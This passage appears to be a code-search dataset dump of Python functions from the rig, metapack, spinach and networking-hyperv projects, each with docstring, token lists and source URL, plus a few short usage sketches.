Parameters
----------
x, y : int
The coordinates of the chip of interest
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`. | [
"Get",
"the",
"coordinates",
"of",
"a",
"chip",
"on",
"its",
"board",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L405-L424 |
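A short sketch of the board-local mapping, again assuming `rig` is installed:

```python
from rig.geometry import spinn5_chip_coord

# The boot chip is, by convention, the Ethernet chip of its own board,
# so it should map to board-local position (0, 0):
print(spinn5_chip_coord(0, 0))  # -> (0, 0)

# Other chips map to their position relative to their board's
# Ethernet-connected chip:
print(spinn5_chip_coord(5, 4))
```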
project-rig/rig | rig/geometry.py | spinn5_fpga_link | def spinn5_fpga_link(x, y, link, root_x=0, root_y=0):
"""Get the identity of the FPGA link which corresponds with the supplied
link.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
whose FPGAs are loaded with the SpI/O 'spinnaker_fpgas' image.
Parameters
----------
x, y : int
The chip whose link is of interest.
link : :py:class:`~rig.links.Link`
The link of interest.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
Returns
-------
(fpga_num, link_num) or None
If not None, the link supplied passes through an FPGA link. The
returned tuple indicates the FPGA responsible for the sending-side of
the link.
`fpga_num` is the number (0, 1 or 2) of the FPGA responsible for the
link.
`link_num` indicates which of the sixteen SpiNNaker links (0 to 15)
into an FPGA is being used. Links 0-7 are typically handled by S-ATA
link 0 and 8-15 are handled by S-ATA link 1.
Returns None if the supplied link does not pass through an FPGA.
"""
x, y = spinn5_chip_coord(x, y, root_x, root_y)
return SPINN5_FPGA_LINKS.get((x, y, link)) | python | def spinn5_fpga_link(x, y, link, root_x=0, root_y=0):
"""Get the identity of the FPGA link which corresponds with the supplied
link.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
whose FPGAs are loaded with the SpI/O 'spinnaker_fpgas' image.
Parameters
----------
x, y : int
The chip whose link is of interest.
link : :py:class:`~rig.links.Link`
The link of interest.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
Returns
-------
(fpga_num, link_num) or None
If not None, the link supplied passes through an FPGA link. The
returned tuple indicates the FPGA responsible for the sending-side of
the link.
`fpga_num` is the number (0, 1 or 2) of the FPGA responsible for the
link.
`link_num` indicates which of the sixteen SpiNNaker links (0 to 15)
into an FPGA is being used. Links 0-7 are typically handled by S-ATA
link 0 and 8-15 are handled by S-ATA link 1.
Returns None if the supplied link does not pass through an FPGA.
"""
x, y = spinn5_chip_coord(x, y, root_x, root_y)
return SPINN5_FPGA_LINKS.get((x, y, link)) | [
"def",
"spinn5_fpga_link",
"(",
"x",
",",
"y",
",",
"link",
",",
"root_x",
"=",
"0",
",",
"root_y",
"=",
"0",
")",
":",
"x",
",",
"y",
"=",
"spinn5_chip_coord",
"(",
"x",
",",
"y",
",",
"root_x",
",",
"root_y",
")",
"return",
"SPINN5_FPGA_LINKS",
".",
"get",
"(",
"(",
"x",
",",
"y",
",",
"link",
")",
")"
] | Get the identity of the FPGA link which corresponds with the supplied
link.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
whose FPGAs are loaded with the SpI/O 'spinnaker_fpgas' image.
Parameters
----------
x, y : int
The chip whose link is of interest.
link : :py:class:`~rig.links.Link`
The link of interest.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
Returns
-------
(fpga_num, link_num) or None
If not None, the link supplied passes through an FPGA link. The
returned tuple indicates the FPGA responsible for the sending-side of
the link.
`fpga_num` is the number (0, 1 or 2) of the FPGA responsible for the
link.
`link_num` indicates which of the sixteen SpiNNaker links (0 to 15)
into an FPGA is being used. Links 0-7 are typically handled by S-ATA
link 0 and 8-15 are handled by S-ATA link 1.
Returns None if the supplied link does not pass through an FPGA. | [
"Get",
"the",
"identity",
"of",
"the",
"FPGA",
"link",
"which",
"corresponds",
"with",
"the",
"supplied",
"link",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L427-L463 |
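A hedged sketch of looking up an FPGA link, assuming `Links` is importable from `rig.links` as the docstring suggests:

```python
from rig.geometry import spinn5_fpga_link
from rig.links import Links

# Does the west-going link of chip (0, 0) leave the board via an FPGA?
fpga = spinn5_fpga_link(0, 0, Links.west)
if fpga is not None:
    fpga_num, link_num = fpga
    print("Handled by FPGA", fpga_num, "via SpiNNaker link", link_num)
else:
    print("Link does not pass through an FPGA")
```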
Metatab/metapack | metapack/package/csv.py | CsvPackageBuilder._load_resource | def _load_resource(self, source_r, abs_path=False):
"""The CSV package has no reseources, so we just need to resolve the URLs to them. Usually, the
CSV package is built from a file system ackage on a publically acessible server. """
r = self.doc.resource(source_r.name)
r.url = self.resource_root.join(r.url).inner | python | def _load_resource(self, source_r, abs_path=False):
"""The CSV package has no reseources, so we just need to resolve the URLs to them. Usually, the
CSV package is built from a file system ackage on a publically acessible server. """
r = self.doc.resource(source_r.name)
r.url = self.resource_root.join(r.url).inner | [
"def",
"_load_resource",
"(",
"self",
",",
"source_r",
",",
"abs_path",
"=",
"False",
")",
":",
"r",
"=",
"self",
".",
"doc",
".",
"resource",
"(",
"source_r",
".",
"name",
")",
"r",
".",
"url",
"=",
"self",
".",
"resource_root",
".",
"join",
"(",
"r",
".",
"url",
")",
".",
"inner"
] | The CSV package has no resources, so we just need to resolve the URLs to them. Usually, the
CSV package is built from a file system package on a publicly accessible server. | [
"The",
"CSV",
"package",
"has",
"no",
"reseources",
"so",
"we",
"just",
"need",
"to",
"resolve",
"the",
"URLs",
"to",
"them",
".",
"Usually",
"the",
"CSV",
"package",
"is",
"built",
"from",
"a",
"file",
"system",
"ackage",
"on",
"a",
"publically",
"acessible",
"server",
"."
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/package/csv.py#L51-L57 |
NicolasLM/spinach | spinach/engine.py | Engine._reset | def _reset(self):
"""Initialization that must happen before the arbiter is (re)started"""
self._arbiter = None
self._workers = None
self._working_queue = None
self._must_stop = threading.Event() | python | def _reset(self):
"""Initialization that must happen before the arbiter is (re)started"""
self._arbiter = None
self._workers = None
self._working_queue = None
self._must_stop = threading.Event() | [
"def",
"_reset",
"(",
"self",
")",
":",
"self",
".",
"_arbiter",
"=",
"None",
"self",
".",
"_workers",
"=",
"None",
"self",
".",
"_working_queue",
"=",
"None",
"self",
".",
"_must_stop",
"=",
"threading",
".",
"Event",
"(",
")"
] | Initialization that must happen before the arbiter is (re)started | [
"Initialization",
"that",
"must",
"happen",
"before",
"the",
"arbiter",
"is",
"(",
"re",
")",
"started"
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L35-L40 |
NicolasLM/spinach | spinach/engine.py | Engine.attach_tasks | def attach_tasks(self, tasks: Tasks):
"""Attach a set of tasks.
A task cannot be scheduled or executed before it is attached to an
Engine.
>>> tasks = Tasks()
>>> spin.attach_tasks(tasks)
"""
if tasks._spin is not None and tasks._spin is not self:
logger.warning('Tasks already attached to a different Engine')
self._tasks.update(tasks)
tasks._spin = self | python | def attach_tasks(self, tasks: Tasks):
"""Attach a set of tasks.
A task cannot be scheduled or executed before it is attached to an
Engine.
>>> tasks = Tasks()
>>> spin.attach_tasks(tasks)
"""
if tasks._spin is not None and tasks._spin is not self:
logger.warning('Tasks already attached to a different Engine')
self._tasks.update(tasks)
tasks._spin = self | [
"def",
"attach_tasks",
"(",
"self",
",",
"tasks",
":",
"Tasks",
")",
":",
"if",
"tasks",
".",
"_spin",
"is",
"not",
"None",
"and",
"tasks",
".",
"_spin",
"is",
"not",
"self",
":",
"logger",
".",
"warning",
"(",
"'Tasks already attached to a different Engine'",
")",
"self",
".",
"_tasks",
".",
"update",
"(",
"tasks",
")",
"tasks",
".",
"_spin",
"=",
"self"
] | Attach a set of tasks.
A task cannot be scheduled or executed before it is attached to an
Engine.
>>> tasks = Tasks()
>>> spin.attach_tasks(tasks) | [
"Attach",
"a",
"set",
"of",
"tasks",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L47-L59 |
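A fuller sketch of the attach flow, assuming spinach's documented top-level API (`Engine`, `Tasks`, `MemoryBroker`); the task and namespace names are made up:

```python
from spinach import Engine, MemoryBroker, Tasks

tasks = Tasks()

@tasks.task(name='compute')
def compute(a, b):
    print(a + b)

spin = Engine(MemoryBroker(), namespace='demo')
spin.attach_tasks(tasks)  # must happen before scheduling or executing
```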
NicolasLM/spinach | spinach/engine.py | Engine.schedule_at | def schedule_at(self, task: Schedulable, at: datetime, *args, **kwargs):
"""Schedule a job to be executed in the future.
:arg task: the task or its name to execute in the background
:arg at: date at which the job should start. It is advised to pass a
timezone aware datetime to lift any ambiguity. However, if a
timezone naive datetime is given, it will be assumed to
contain UTC time.
:arg args: args to be passed to the task function
:arg kwargs: kwargs to be passed to the task function
"""
task = self._tasks.get(task)
job = Job(task.name, task.queue, at, task.max_retries, task_args=args,
task_kwargs=kwargs)
return self._broker.enqueue_jobs([job]) | python | def schedule_at(self, task: Schedulable, at: datetime, *args, **kwargs):
"""Schedule a job to be executed in the future.
:arg task: the task or its name to execute in the background
:arg at: date at which the job should start. It is advised to pass a
timezone aware datetime to lift any ambiguity. However, if a
timezone naive datetime is given, it will be assumed to
contain UTC time.
:arg args: args to be passed to the task function
:arg kwargs: kwargs to be passed to the task function
"""
task = self._tasks.get(task)
job = Job(task.name, task.queue, at, task.max_retries, task_args=args,
task_kwargs=kwargs)
return self._broker.enqueue_jobs([job]) | [
"def",
"schedule_at",
"(",
"self",
",",
"task",
":",
"Schedulable",
",",
"at",
":",
"datetime",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"task",
"=",
"self",
".",
"_tasks",
".",
"get",
"(",
"task",
")",
"job",
"=",
"Job",
"(",
"task",
".",
"name",
",",
"task",
".",
"queue",
",",
"at",
",",
"task",
".",
"max_retries",
",",
"task_args",
"=",
"args",
",",
"task_kwargs",
"=",
"kwargs",
")",
"return",
"self",
".",
"_broker",
".",
"enqueue_jobs",
"(",
"[",
"job",
"]",
")"
] | Schedule a job to be executed in the future.
:arg task: the task or its name to execute in the background
:arg at: date at which the job should start. It is advised to pass a
timezone aware datetime to lift any ambiguity. However, if a
timezone naive datetime is given, it will be assumed to
contain UTC time.
:arg args: args to be passed to the task function
:arg kwargs: kwargs to be passed to the task function | [
"Schedule",
"a",
"job",
"to",
"be",
"executed",
"in",
"the",
"future",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L74-L88 |
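Continuing the sketch above, a deferred-scheduling example; passing a timezone-aware datetime avoids the UTC assumption described in the docstring:

```python
from datetime import datetime, timedelta, timezone

# Run compute(20, 22) roughly five minutes from now, using the engine
# and the 'compute' task registered in the previous sketch.
run_at = datetime.now(timezone.utc) + timedelta(minutes=5)
spin.schedule_at('compute', run_at, 20, 22)
```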
NicolasLM/spinach | spinach/engine.py | Engine.schedule_batch | def schedule_batch(self, batch: Batch):
"""Schedule many jobs at once.
Scheduling jobs in batches allows to enqueue them fast by avoiding
round-trips to the broker.
:arg batch: :class:`Batch` instance containing jobs to schedule
"""
jobs = list()
for task, at, args, kwargs in batch.jobs_to_create:
task = self._tasks.get(task)
jobs.append(
Job(task.name, task.queue, at, task.max_retries,
task_args=args, task_kwargs=kwargs)
)
return self._broker.enqueue_jobs(jobs) | python | def schedule_batch(self, batch: Batch):
"""Schedule many jobs at once.
Scheduling jobs in batches allows them to be enqueued quickly by avoiding
round-trips to the broker.
:arg batch: :class:`Batch` instance containing jobs to schedule
"""
jobs = list()
for task, at, args, kwargs in batch.jobs_to_create:
task = self._tasks.get(task)
jobs.append(
Job(task.name, task.queue, at, task.max_retries,
task_args=args, task_kwargs=kwargs)
)
return self._broker.enqueue_jobs(jobs) | [
"def",
"schedule_batch",
"(",
"self",
",",
"batch",
":",
"Batch",
")",
":",
"jobs",
"=",
"list",
"(",
")",
"for",
"task",
",",
"at",
",",
"args",
",",
"kwargs",
"in",
"batch",
".",
"jobs_to_create",
":",
"task",
"=",
"self",
".",
"_tasks",
".",
"get",
"(",
"task",
")",
"jobs",
".",
"append",
"(",
"Job",
"(",
"task",
".",
"name",
",",
"task",
".",
"queue",
",",
"at",
",",
"task",
".",
"max_retries",
",",
"task_args",
"=",
"args",
",",
"task_kwargs",
"=",
"kwargs",
")",
")",
"return",
"self",
".",
"_broker",
".",
"enqueue_jobs",
"(",
"jobs",
")"
] | Schedule many jobs at once.
Scheduling jobs in batches allows them to be enqueued quickly by avoiding
round-trips to the broker.
:arg batch: :class:`Batch` instance containing jobs to schedule | [
"Schedule",
"many",
"jobs",
"at",
"once",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L90-L105 |
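A sketch of batching, assuming `Batch` is importable from the spinach top level with `schedule`/`schedule_at` helpers as in the project's documentation:

```python
from datetime import datetime, timedelta, timezone
from spinach import Batch

batch = Batch()
for i in range(100):
    batch.schedule('compute', i, i + 1)  # run as soon as possible
batch.schedule_at('compute',
                  datetime.now(timezone.utc) + timedelta(hours=1), 0, 0)
spin.schedule_batch(batch)  # one round-trip to the broker for all jobs
```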
NicolasLM/spinach | spinach/engine.py | Engine.start_workers | def start_workers(self, number: int=DEFAULT_WORKER_NUMBER,
queue=DEFAULT_QUEUE, block=True,
stop_when_queue_empty=False):
"""Start the worker threads.
:arg number: number of worker threads to launch
:arg queue: name of the queue to consume, see :doc:`queues`
:arg block: whether to block the calling thread until a signal arrives
and workers get terminated
:arg stop_when_queue_empty: automatically stop the workers when the
queue is empty. Useful mostly for one-off scripts and testing.
"""
if self._arbiter or self._workers:
raise RuntimeError('Workers are already running')
self._working_queue = queue
tasks_names = '\n'.join(
[' - ' + task.name for task in self._tasks.tasks.values()
if task.queue == self._working_queue]
)
logger.info('Starting %d workers on queue "%s" with tasks:\n%s',
number, self._working_queue, tasks_names)
# Start the broker
self._broker.start()
# Start workers
self._workers = Workers(
num_workers=number,
namespace=self.namespace,
)
# Start the result notifier
self._result_notifier = threading.Thread(
target=run_forever,
args=(self._result_notifier_func, self._must_stop, logger),
name='{}-result-notifier'.format(self.namespace)
)
self._result_notifier.start()
# Start the arbiter
self._arbiter = threading.Thread(
target=run_forever,
args=(self._arbiter_func, self._must_stop, logger,
stop_when_queue_empty),
name='{}-arbiter'.format(self.namespace)
)
self._arbiter.start()
if block:
with handle_sigterm():
try:
self._arbiter.join()
except KeyboardInterrupt:
self.stop_workers()
except AttributeError:
# Arbiter thread starts and stops immediately when run with
# `stop_when_queue_empty` and the queue is already empty.
pass | python | def start_workers(self, number: int=DEFAULT_WORKER_NUMBER,
queue=DEFAULT_QUEUE, block=True,
stop_when_queue_empty=False):
"""Start the worker threads.
:arg number: number of worker threads to launch
:arg queue: name of the queue to consume, see :doc:`queues`
:arg block: whether to block the calling thread until a signal arrives
and workers get terminated
:arg stop_when_queue_empty: automatically stop the workers when the
queue is empty. Useful mostly for one-off scripts and testing.
"""
if self._arbiter or self._workers:
raise RuntimeError('Workers are already running')
self._working_queue = queue
tasks_names = '\n'.join(
[' - ' + task.name for task in self._tasks.tasks.values()
if task.queue == self._working_queue]
)
logger.info('Starting %d workers on queue "%s" with tasks:\n%s',
number, self._working_queue, tasks_names)
# Start the broker
self._broker.start()
# Start workers
self._workers = Workers(
num_workers=number,
namespace=self.namespace,
)
# Start the result notifier
self._result_notifier = threading.Thread(
target=run_forever,
args=(self._result_notifier_func, self._must_stop, logger),
name='{}-result-notifier'.format(self.namespace)
)
self._result_notifier.start()
# Start the arbiter
self._arbiter = threading.Thread(
target=run_forever,
args=(self._arbiter_func, self._must_stop, logger,
stop_when_queue_empty),
name='{}-arbiter'.format(self.namespace)
)
self._arbiter.start()
if block:
with handle_sigterm():
try:
self._arbiter.join()
except KeyboardInterrupt:
self.stop_workers()
except AttributeError:
# Arbiter thread starts and stops immediately when run with
# `stop_when_queue_empty` and the queue is already empty.
pass | [
"def",
"start_workers",
"(",
"self",
",",
"number",
":",
"int",
"=",
"DEFAULT_WORKER_NUMBER",
",",
"queue",
"=",
"DEFAULT_QUEUE",
",",
"block",
"=",
"True",
",",
"stop_when_queue_empty",
"=",
"False",
")",
":",
"if",
"self",
".",
"_arbiter",
"or",
"self",
".",
"_workers",
":",
"raise",
"RuntimeError",
"(",
"'Workers are already running'",
")",
"self",
".",
"_working_queue",
"=",
"queue",
"tasks_names",
"=",
"'\\n'",
".",
"join",
"(",
"[",
"' - '",
"+",
"task",
".",
"name",
"for",
"task",
"in",
"self",
".",
"_tasks",
".",
"tasks",
".",
"values",
"(",
")",
"if",
"task",
".",
"queue",
"==",
"self",
".",
"_working_queue",
"]",
")",
"logger",
".",
"info",
"(",
"'Starting %d workers on queue \"%s\" with tasks:\\n%s'",
",",
"number",
",",
"self",
".",
"_working_queue",
",",
"tasks_names",
")",
"# Start the broker",
"self",
".",
"_broker",
".",
"start",
"(",
")",
"# Start workers",
"self",
".",
"_workers",
"=",
"Workers",
"(",
"num_workers",
"=",
"number",
",",
"namespace",
"=",
"self",
".",
"namespace",
",",
")",
"# Start the result notifier",
"self",
".",
"_result_notifier",
"=",
"threading",
".",
"Thread",
"(",
"target",
"=",
"run_forever",
",",
"args",
"=",
"(",
"self",
".",
"_result_notifier_func",
",",
"self",
".",
"_must_stop",
",",
"logger",
")",
",",
"name",
"=",
"'{}-result-notifier'",
".",
"format",
"(",
"self",
".",
"namespace",
")",
")",
"self",
".",
"_result_notifier",
".",
"start",
"(",
")",
"# Start the arbiter",
"self",
".",
"_arbiter",
"=",
"threading",
".",
"Thread",
"(",
"target",
"=",
"run_forever",
",",
"args",
"=",
"(",
"self",
".",
"_arbiter_func",
",",
"self",
".",
"_must_stop",
",",
"logger",
",",
"stop_when_queue_empty",
")",
",",
"name",
"=",
"'{}-arbiter'",
".",
"format",
"(",
"self",
".",
"namespace",
")",
")",
"self",
".",
"_arbiter",
".",
"start",
"(",
")",
"if",
"block",
":",
"with",
"handle_sigterm",
"(",
")",
":",
"try",
":",
"self",
".",
"_arbiter",
".",
"join",
"(",
")",
"except",
"KeyboardInterrupt",
":",
"self",
".",
"stop_workers",
"(",
")",
"except",
"AttributeError",
":",
"# Arbiter thread starts and stops immediately when ran with",
"# `stop_when_queue_empty` and queue is already empty.",
"pass"
] | Start the worker threads.
:arg number: number of worker threads to launch
:arg queue: name of the queue to consume, see :doc:`queues`
:arg block: whether to block the calling thread until a signal arrives
and workers get terminated
:arg stop_when_queue_empty: automatically stop the workers when the
queue is empty. Useful mostly for one-off scripts and testing. | [
"Start",
"the",
"worker",
"threads",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L148-L207 |
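Two common invocations, continuing the engine sketch above:

```python
# Blocking one-off run: drain the default queue with 5 workers, then return.
spin.start_workers(number=5, stop_when_queue_empty=True)

# Alternatively, keep the calling thread free and stop explicitly later:
spin.start_workers(number=5, block=False)
# ... do other work ...
spin.stop_workers()
```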
NicolasLM/spinach | spinach/engine.py | Engine.stop_workers | def stop_workers(self, _join_arbiter=True):
"""Stop the workers and wait for them to terminate."""
# _join_arbiter is used internally when the arbiter is shutting down
# the full engine itself. This is because the arbiter thread cannot
# join itself.
self._must_stop.set()
self._workers.stop()
self._result_notifier.join()
self._broker.stop()
if _join_arbiter:
self._arbiter.join()
self._reset() | python | def stop_workers(self, _join_arbiter=True):
"""Stop the workers and wait for them to terminate."""
# _join_arbiter is used internally when the arbiter is shutting down
# the full engine itself. This is because the arbiter thread cannot
# join itself.
self._must_stop.set()
self._workers.stop()
self._result_notifier.join()
self._broker.stop()
if _join_arbiter:
self._arbiter.join()
self._reset() | [
"def",
"stop_workers",
"(",
"self",
",",
"_join_arbiter",
"=",
"True",
")",
":",
"# _join_arbiter is used internally when the arbiter is shutting down",
"# the full engine itself. This is because the arbiter thread cannot",
"# join itself.",
"self",
".",
"_must_stop",
".",
"set",
"(",
")",
"self",
".",
"_workers",
".",
"stop",
"(",
")",
"self",
".",
"_result_notifier",
".",
"join",
"(",
")",
"self",
".",
"_broker",
".",
"stop",
"(",
")",
"if",
"_join_arbiter",
":",
"self",
".",
"_arbiter",
".",
"join",
"(",
")",
"self",
".",
"_reset",
"(",
")"
] | Stop the workers and wait for them to terminate. | [
"Stop",
"the",
"workers",
"and",
"wait",
"for",
"them",
"to",
"terminate",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L209-L220 |
openstack/networking-hyperv | networking_hyperv/neutron/trunk_driver.py | HyperVTrunkDriver.handle_trunks | def handle_trunks(self, trunks, event_type):
"""Trunk data model change from the server."""
LOG.debug("Trunks event received: %(event_type)s. Trunks: %(trunks)s",
{'event_type': event_type, 'trunks': trunks})
if event_type == events.DELETED:
# The port trunks have been deleted. Remove them from cache.
for trunk in trunks:
self._trunks.pop(trunk.id, None)
else:
for trunk in trunks:
self._trunks[trunk.id] = trunk
self._setup_trunk(trunk) | python | def handle_trunks(self, trunks, event_type):
"""Trunk data model change from the server."""
LOG.debug("Trunks event received: %(event_type)s. Trunks: %(trunks)s",
{'event_type': event_type, 'trunks': trunks})
if event_type == events.DELETED:
# The port trunks have been deleted. Remove them from cache.
for trunk in trunks:
self._trunks.pop(trunk.id, None)
else:
for trunk in trunks:
self._trunks[trunk.id] = trunk
self._setup_trunk(trunk) | [
"def",
"handle_trunks",
"(",
"self",
",",
"trunks",
",",
"event_type",
")",
":",
"LOG",
".",
"debug",
"(",
"\"Trunks event received: %(event_type)s. Trunks: %(trunks)s\"",
",",
"{",
"'event_type'",
":",
"event_type",
",",
"'trunks'",
":",
"trunks",
"}",
")",
"if",
"event_type",
"==",
"events",
".",
"DELETED",
":",
"# The port trunks have been deleted. Remove them from cache.",
"for",
"trunk",
"in",
"trunks",
":",
"self",
".",
"_trunks",
".",
"pop",
"(",
"trunk",
".",
"id",
",",
"None",
")",
"else",
":",
"for",
"trunk",
"in",
"trunks",
":",
"self",
".",
"_trunks",
"[",
"trunk",
".",
"id",
"]",
"=",
"trunk",
"self",
".",
"_setup_trunk",
"(",
"trunk",
")"
] | Trunk data model change from the server. | [
"Trunk",
"data",
"model",
"change",
"from",
"the",
"server",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/trunk_driver.py#L46-L59 |
openstack/networking-hyperv | networking_hyperv/neutron/trunk_driver.py | HyperVTrunkDriver.handle_subports | def handle_subports(self, subports, event_type):
"""Subport data model change from the server."""
LOG.debug("Subports event received: %(event_type)s. "
"Subports: %(subports)s",
{'event_type': event_type, 'subports': subports})
# update the cache.
if event_type == events.CREATED:
for subport in subports:
trunk = self._trunks.get(subport['trunk_id'])
if trunk:
trunk.sub_ports.append(subport)
elif event_type == events.DELETED:
for subport in subports:
trunk = self._trunks.get(subport['trunk_id'])
if trunk and subport in trunk.sub_ports:
trunk.sub_ports.remove(subport)
# update the bound trunks.
affected_trunk_ids = set([s['trunk_id'] for s in subports])
for trunk_id in affected_trunk_ids:
trunk = self._trunks.get(trunk_id)
if trunk:
self._setup_trunk(trunk) | python | def handle_subports(self, subports, event_type):
"""Subport data model change from the server."""
LOG.debug("Subports event received: %(event_type)s. "
"Subports: %(subports)s",
{'event_type': event_type, 'subports': subports})
# update the cache.
if event_type == events.CREATED:
for subport in subports:
trunk = self._trunks.get(subport['trunk_id'])
if trunk:
trunk.sub_ports.append(subport)
elif event_type == events.DELETED:
for subport in subports:
trunk = self._trunks.get(subport['trunk_id'])
if trunk and subport in trunk.sub_ports:
trunk.sub_ports.remove(subport)
# update the bound trunks.
affected_trunk_ids = set([s['trunk_id'] for s in subports])
for trunk_id in affected_trunk_ids:
trunk = self._trunks.get(trunk_id)
if trunk:
self._setup_trunk(trunk) | [
"def",
"handle_subports",
"(",
"self",
",",
"subports",
",",
"event_type",
")",
":",
"LOG",
".",
"debug",
"(",
"\"Subports event received: %(event_type)s. \"",
"\"Subports: %(subports)s\"",
",",
"{",
"'event_type'",
":",
"event_type",
",",
"'subports'",
":",
"subports",
"}",
")",
"# update the cache.",
"if",
"event_type",
"==",
"events",
".",
"CREATED",
":",
"for",
"subport",
"in",
"subports",
":",
"trunk",
"=",
"self",
".",
"_trunks",
".",
"get",
"(",
"subport",
"[",
"'trunk_id'",
"]",
")",
"if",
"trunk",
":",
"trunk",
".",
"sub_ports",
".",
"append",
"(",
"subport",
")",
"elif",
"event_type",
"==",
"events",
".",
"DELETED",
":",
"for",
"subport",
"in",
"subports",
":",
"trunk",
"=",
"self",
".",
"_trunks",
".",
"get",
"(",
"subport",
"[",
"'trunk_id'",
"]",
")",
"if",
"trunk",
"and",
"subport",
"in",
"trunk",
".",
"sub_ports",
":",
"trunk",
".",
"sub_ports",
".",
"remove",
"(",
"subport",
")",
"# update the bound trunks.",
"affected_trunk_ids",
"=",
"set",
"(",
"[",
"s",
"[",
"'trunk_id'",
"]",
"for",
"s",
"in",
"subports",
"]",
")",
"for",
"trunk_id",
"in",
"affected_trunk_ids",
":",
"trunk",
"=",
"self",
".",
"_trunks",
".",
"get",
"(",
"trunk_id",
")",
"if",
"trunk",
":",
"self",
".",
"_setup_trunk",
"(",
"trunk",
")"
] | Subport data model change from the server. | [
"Subport",
"data",
"model",
"change",
"from",
"the",
"server",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/trunk_driver.py#L61-L85 |
openstack/networking-hyperv | networking_hyperv/neutron/trunk_driver.py | HyperVTrunkDriver._setup_trunk | def _setup_trunk(self, trunk, vlan_id=None):
"""Sets up VLAN trunk and updates the trunk status."""
LOG.info('Binding trunk port: %s.', trunk)
try:
# bind sub_ports to host.
self._trunk_rpc.update_subport_bindings(self._context,
trunk.sub_ports)
vlan_trunk = [s.segmentation_id for s in trunk.sub_ports]
self._set_port_vlan(trunk.port_id, vlan_id, vlan_trunk)
self._trunk_rpc.update_trunk_status(self._context, trunk.id,
t_const.ACTIVE_STATUS)
except Exception:
# something broke
LOG.exception("Failure setting up subports for %s", trunk.port_id)
self._trunk_rpc.update_trunk_status(self._context, trunk.id,
t_const.DEGRADED_STATUS) | python | def _setup_trunk(self, trunk, vlan_id=None):
"""Sets up VLAN trunk and updates the trunk status."""
LOG.info('Binding trunk port: %s.', trunk)
try:
# bind sub_ports to host.
self._trunk_rpc.update_subport_bindings(self._context,
trunk.sub_ports)
vlan_trunk = [s.segmentation_id for s in trunk.sub_ports]
self._set_port_vlan(trunk.port_id, vlan_id, vlan_trunk)
self._trunk_rpc.update_trunk_status(self._context, trunk.id,
t_const.ACTIVE_STATUS)
except Exception:
# something broke
LOG.exception("Failure setting up subports for %s", trunk.port_id)
self._trunk_rpc.update_trunk_status(self._context, trunk.id,
t_const.DEGRADED_STATUS) | [
"def",
"_setup_trunk",
"(",
"self",
",",
"trunk",
",",
"vlan_id",
"=",
"None",
")",
":",
"LOG",
".",
"info",
"(",
"'Binding trunk port: %s.'",
",",
"trunk",
")",
"try",
":",
"# bind sub_ports to host.",
"self",
".",
"_trunk_rpc",
".",
"update_subport_bindings",
"(",
"self",
".",
"_context",
",",
"trunk",
".",
"sub_ports",
")",
"vlan_trunk",
"=",
"[",
"s",
".",
"segmentation_id",
"for",
"s",
"in",
"trunk",
".",
"sub_ports",
"]",
"self",
".",
"_set_port_vlan",
"(",
"trunk",
".",
"port_id",
",",
"vlan_id",
",",
"vlan_trunk",
")",
"self",
".",
"_trunk_rpc",
".",
"update_trunk_status",
"(",
"self",
".",
"_context",
",",
"trunk",
".",
"id",
",",
"t_const",
".",
"ACTIVE_STATUS",
")",
"except",
"Exception",
":",
"# something broke",
"LOG",
".",
"exception",
"(",
"\"Failure setting up subports for %s\"",
",",
"trunk",
".",
"port_id",
")",
"self",
".",
"_trunk_rpc",
".",
"update_trunk_status",
"(",
"self",
".",
"_context",
",",
"trunk",
".",
"id",
",",
"t_const",
".",
"DEGRADED_STATUS",
")"
] | Sets up VLAN trunk and updates the trunk status. | [
"Sets",
"up",
"VLAN",
"trunk",
"and",
"updates",
"the",
"trunk",
"status",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/trunk_driver.py#L115-L133 |
openstack/networking-hyperv | networking_hyperv/neutron/agent/hnv_metadata_agent.py | main | def main():
"""The entry point for neutron-hnv-metadata-proxy."""
register_config_opts()
common_config.init(sys.argv[1:])
neutron_config.setup_logging()
proxy = MetadataProxy()
proxy.run() | python | def main():
"""The entry point for neutron-hnv-metadata-proxy."""
register_config_opts()
common_config.init(sys.argv[1:])
neutron_config.setup_logging()
proxy = MetadataProxy()
proxy.run() | [
"def",
"main",
"(",
")",
":",
"register_config_opts",
"(",
")",
"common_config",
".",
"init",
"(",
"sys",
".",
"argv",
"[",
"1",
":",
"]",
")",
"neutron_config",
".",
"setup_logging",
"(",
")",
"proxy",
"=",
"MetadataProxy",
"(",
")",
"proxy",
".",
"run",
"(",
")"
] | The entry point for neutron-hnv-metadata-proxy. | [
"The",
"entry",
"point",
"for",
"neutron",
"-",
"hnv",
"-",
"metadata",
